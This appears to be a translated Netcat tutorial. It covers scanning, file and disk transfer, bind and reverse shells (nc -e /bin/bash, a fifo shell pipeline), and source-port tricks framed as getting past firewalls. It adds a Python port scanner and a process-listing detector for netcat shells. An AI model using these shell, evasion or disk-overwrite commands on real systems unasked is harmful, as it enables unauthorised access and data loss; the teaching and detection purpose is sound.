
Linux Netcat Command – Swiss Army Knife in Network Tools

This article thoroughly explains Netcat with various use cases and examples.

Netcat is the Swiss army knife of network tools. It can read and write data on the network using TCP and UDP, and because it can be combined with other tools through pipes and redirection, it can be used in scripts in a great variety of ways. What can be done with the Netcat command is surprising.

Netcat establishes a link between two computers and returns two data streams. What you can do after that depends on your imagination. You can set up a server, transfer files, chat with friends, transfer streaming media, or use it as a separate client for other protocols.

Here are some examples of using the Linux Netcat command. Two machines are used throughout: A (172.31.100.7) and B (172.31.100.23).

1. Port Scanning

Port scanning is often used by system administrators and hackers to find open ports on a machine, which helps them identify vulnerabilities in the system.

$nc -z -v -n 172.31.100.7 21-25

It can run in TCP or UDP mode. The default is TCP; the -u parameter switches it to UDP.

The -z parameter tells Netcat to use zero-I/O mode: close the connection immediately after it is established and exchange no data.

The -v parameter enables verbose output.

The -n parameter tells Netcat not to use DNS to resolve the IP address back to a host name.

This command prints all open ports from 21 to 25. A banner is a text message that the service you connect to sends you. Banner information is very useful when you try to identify the type and version of a service, or vulnerabilities in it. However, not all services send a banner.

Once you find an open port, you can easily connect to the service with Netcat and grab its banner.

$ nc -v 172.31.100.7 21

The Netcat command connects to open port 21 and prints the banner of the service running on this port.
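As an added example that is not part of the original article, the following Python script does what `nc -z` and `nc -v` do above: a zero-I/O connect scan over a port range, followed by a banner grab on each open port. So that it runs offline it starts a constructed local banner service on 127.0.0.1; that service, its banner text and the scanned port range are assumptions made for the demonstration.

```python
import socket
import threading

# Constructed local service for the demonstration: on connect it sends a
# banner, the way an FTP or SMTP daemon would, then closes the connection.
BANNER = b"220 demo-ftp ready\r\n"

def start_banner_service():
    """Start a throwaway TCP listener on 127.0.0.1 and return its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    conn.sendall(BANNER)
                except OSError:
                    pass  # a -z style probe hangs up before reading anything

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def scan_ports(host, first, last, timeout=0.5):
    """Zero-I/O connect scan, what `nc -z` does: complete the TCP handshake,
    close at once, send nothing. Returns the list of open ports."""
    open_ports = []
    for port in range(first, last + 1):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

def grab_banner(host, port, timeout=1.0):
    """Connect and read what the service volunteers, what `nc -v host port`
    shows. A service that waits for the client to speak first yields b""."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""

if __name__ == "__main__":
    port = start_banner_service()
    for p in scan_ports("127.0.0.1", port - 2, port + 2):
        print(p, grab_banner("127.0.0.1", p))
```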

2. Chat Server

If you want to talk to your friends, there is plenty of chat software and messaging services available. But what if you don't have such luxuries? For example, you are in a computer laboratory where all external connections are restricted; how do you talk all day with your friend sitting in the next room? Don't be depressed. Netcat offers a way: you create a chat server on a predetermined port so your friend can contact you.

Server:

$nc -l 1567

The Netcat command starts a TCP server on port 1567. Whatever is typed on standard input is sent to the peer connected to this port, and whatever the peer sends is printed to standard output, so both sides of the conversation are displayed in this shell.

Client:

$nc 172.31.100.7 1567

Whatever you type on Machine B will appear on Machine A.

3. File Transfer

We often need to transfer files over the network. There are many methods, such as FTP, SCP, and SMB, but when you only need to transfer a file temporarily or once, it is not worth the time to install and configure software on your machine. Let's suppose you want to transfer a file (file.txt) from A to B. Either A or B can act as the server or the client; here A will be the server and B the client.

Server:

$nc -l 1567 < file.txt

Client:

$nc -n 172.31.100.7 1567 > file.txt

Here, we create a server on A and redirect Netcat's input from file.txt. When a client connects to the port, Netcat sends the contents of the file.

On the client side, we redirect the output to file.txt. When B connects to A, A sends the file contents and B saves them to file.txt.

The side that holds the file does not have to be the server; it can also work the other way around. In the following example, the server is created on B and receives the file, while the client sends it. This time we only need to redirect the server's Netcat output to a file and redirect the client's input from the file.

Server (on B):

$nc -l 1567 > file.txt

Client:

$nc 172.31.100.23 1567 < file.txt

4. Directory Transfer

Sending a file is simple, and sending multiple files (or an entire directory) is just as simple. We only need to use the archiving tool tar.

Follow the steps below to transfer a directory from A to B using the network.

Server:

$tar -cvf - dir_name | nc -l 1567

Client:

$nc -n 172.31.100.7 1567 | tar -xvf -

On the server A we create a tar archive of the directory, write it to standard output (the "-" file name), and pipe it to Netcat, which sends it over the network.

On the client side we receive the archive through Netcat and pipe it to tar, which unpacks it.

If you want to save bandwidth, you can compress the archive with bzip2 or another tool before sending it.

Server:

$tar -cvf - dir_name | bzip2 -z | nc -l 1567

Compression using bzip2.

Client:

$nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -

Decompression using bzip2.

5. Encrypt the Data You Send Using the Network

If you are worried about the security of data sent over the network, you can encrypt it with a tool (such as mcrypt) before sending it.

Receiving side (connects, then decrypts the stream with mcrypt):

$nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt

Sending side (encrypts the file with mcrypt, then listens):

$mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567

Note that in this example the sending side is the one listening and the receiving side is the one connecting; the -d option selects decryption.

The preceding two commands will prompt you for a password. Ensure that both ends use the same password.

Here, we use mcrypt for encryption, but any other encryption tool can be used. Note that ECB mode, used above, turns identical plaintext blocks into identical ciphertext blocks and adds no integrity check, so treat it as a demonstration only; for real transfers use a different cipher mode with authentication, or carry the Netcat stream through an SSH or TLS tunnel.

6. Streaming Video

This is not the best way to stream video, but if no dedicated tool is available on the server, Netcat can still make it work.

Server:

$cat video.avi | nc -l 1567

Here, we simply read a video file and pipe it into Netcat, which serves it to the client that connects.

Client:

$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here, we read the data from the socket and pipe it to mplayer.

7. Clone a Device

You have installed and configured a Linux machine and need to do the same on other machines, but you do not want to repeat the work. Instead of repeating the installation and configuration process, boot the other machine from a flash drive and clone your machine onto it.

If your system is on the disk /dev/sda, cloning the Linux PC is simple.

Server:

$dd if=/dev/sda | nc -l 1567

Client:

$nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd is a tool that reads raw data from a disk. We pipe its output to the other machine through the Netcat server, where it is written to disk. This copies everything, including the partition table. If the target is already partitioned and we only need to clone the root partition, replace sda with sda1 or sda2, depending on where the root partition is.

8. Open a Shell

We have all used remote shells (with telnet and ssh), but if these two commands are not installed and we do not have permission to install them, we can also use Netcat to create a remote shell.

Let's say your Netcat supports the -c or -e parameter (the default Netcat).

Server:

$nc -l 1567 -e /bin/bash -i

Client:

$nc 172.31.100.7 1567

Here, we have created a Netcat server and told it to execute /bin/bash when a client connects successfully.

If Netcat does not support the -c or -e parameter (OpenBSD netcat), we can still create a remote shell.

Server:

$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here, we create a fifo file and use a pipeline to feed the contents of this fifo to the shell. 2>&1 redirects the shell's standard error into its standard output, which is then piped to Netcat listening on port 1567. Finally, Netcat's output is redirected into the fifo file.

How it works:

  • Input received from the network is written to the fifo file.
  • The cat command reads the fifo file, and its contents are sent to the sh command.
  • The sh command executes the input and writes its output back to Netcat.
  • Netcat sends the output to the client over the network.
  • It works because the pipeline makes the commands run in parallel and the fifo replaces a normal file: a read on a fifo blocks until data arrives. With a normal file, cat would finish immediately after reading the empty file.
  • On the client side, simply connect to the server.

Client:

$nc -n 172.31.100.7 1567

You will get a shell prompt on the client.

9. Reverse Shell

A reverse shell is a shell that is opened on the client side. It is called a reverse shell because, unlike the previous configurations, the server here uses a service provided by the client.

Server:

$nc -l 1567

On the client side, tell Netcat to execute the shell once the connection is established:

Client:

$nc 172.31.100.7 1567 -e /bin/bash

What is special about reverse shell?

A reverse shell is often used to get around firewall restrictions such as blocked inbound connections. For example, I have the private IP address 172.31.100.7 and reach the external network through a proxy server. If I want to access this machine from a host outside the network (such as 1.2.3.4), I use a reverse shell for this purpose.
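Sections 8 and 9 show the shapes a Netcat bind shell and reverse shell take on a host. As an added example that is not from the original article, the following Python script flags those shapes in a process listing so a defender can pick them out of `ps` output; the sample listing, its pids and the labels are constructed for the demonstration.

```python
import re

# Constructed sample process listing (pid and command line), the shape that
# `ps -eo pid,args` prints. Pids 1590, 1611 and 1644 mirror the bind-shell,
# fifo and reverse-shell commands shown in sections 8 and 9.
SAMPLE_PS = """\
  812 /usr/sbin/sshd -D
 1503 nc -l 1567 < file.txt
 1590 nc -l 1567 -e /bin/bash -i
 1611 cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
 1644 nc 172.31.100.7 1567 -e /bin/bash
 1702 nc -z -v -n 172.31.100.7 21-25
"""

NC_NAMES = r"\b(?:nc|ncat|netcat)\b"
# Patterns that tie a netcat process to a shell rather than a plain data stream.
SHELL_EXEC = re.compile(NC_NAMES + r".*\s-[ce]\s+\S*(?:sh|bash)\b")
FIFO_SHELL = re.compile(r"/bin/(?:sh|bash).*\|\s*" + NC_NAMES + r"\s+-l")
LISTENER = re.compile(NC_NAMES + r".*\s-l\b")

def classify(cmdline):
    """Return a label for one command line, or None if nothing stands out."""
    if FIFO_SHELL.search(cmdline):
        return "bind shell (fifo pipeline)"
    if SHELL_EXEC.search(cmdline):
        # With -l the shell is offered on a listening port; without it the
        # process dials out, i.e. a reverse shell.
        return "bind shell (-e)" if LISTENER.search(cmdline) else "reverse shell (-e)"
    if LISTENER.search(cmdline):
        return "netcat listener"
    return None

def scan_process_list(text):
    """Map pid -> label for every flagged line of a ps-style listing."""
    findings = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        label = classify(parts[1])
        if label:
            findings[int(parts[0])] = label
    return findings

if __name__ == "__main__":
    for pid, label in scan_process_list(SAMPLE_PS).items():
        print(pid, label)
```

A plain `nc -l` listener is reported too, since the file-transfer and chat listeners of the earlier sections look the same from the outside and deserve a look.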

10. Specify the Source Port

Suppose your firewall filters all ports except port 25; then you need the -p option to specify the source port.

Server:

$nc -l 1567

Client:

$nc 172.31.100.7 1567 -p 25

Using a port below 1024 requires root permissions.

This command uses port 25 on the client as the source port for the connection. Without -p, a random source port is used.

11. Specify the Source Address

Let's suppose your machine has multiple addresses and you want to choose which one is used for outbound communication. The -s option tells Netcat which IP address to use.

Server:

$nc -u -l 1567 < file.txt

Client:

$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

This command binds to the address 172.31.100.5 as the source.

These are just a few examples of using Netcat.

Other uses include:

  • Using the -t option to emulate a Telnet client
  • Using it as an HTTP client to download files
  • Connecting to a mail server and checking mail using the SMTP protocol
  • Using ffmpeg to capture the screen and share it as a stream

As long as you know the protocol, you can use Netcat as a network communication medium to implement various clients.

Disclaimer: This is a translated article from Linux China, all rights reserved to the original author. The views expressed herein are for reference only and don't necessarily represent the official views of Alibaba Cloud.
